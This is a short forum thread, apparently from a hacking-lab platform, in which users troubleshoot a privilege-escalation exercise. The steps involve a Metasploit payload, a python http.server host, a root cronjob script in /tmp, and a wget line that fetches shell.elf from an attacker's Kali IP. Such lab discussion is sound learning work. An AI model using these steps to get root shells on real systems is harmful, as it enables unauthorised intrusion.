Blog Post
kevin1 can you please show, in order, the following steps:
- generate the Metasploit payload
- host it using python http.server
- echo command in your original low-level meterpreter shell after exploiting webdav.
Hi Stefan. Please see the screenshots and hopefully you can shed spme light on this saga.😊
- StefanApostol21 days ago
Immerser
so in theory this should be it. after a minute, the cronjob should run. you can test this by going to /tmp and running clear-dav.sh manually. if it works, cron will do the same thing, but as root
- kevin111 days ago
Bronze II
Using the echo command in the third picture must be wrong as it's not downloading a file from the HTTP server and getting a connection back to the Metaspoloit listener to enable to be root to obtain the token. I've tried so hard for a long time on this question. Please, please advise?
- jamesstammers11 days ago
Bronze II
If you run just the wget http://< kali ip >/shell.elf command, (not in a cronjob) does it download the file?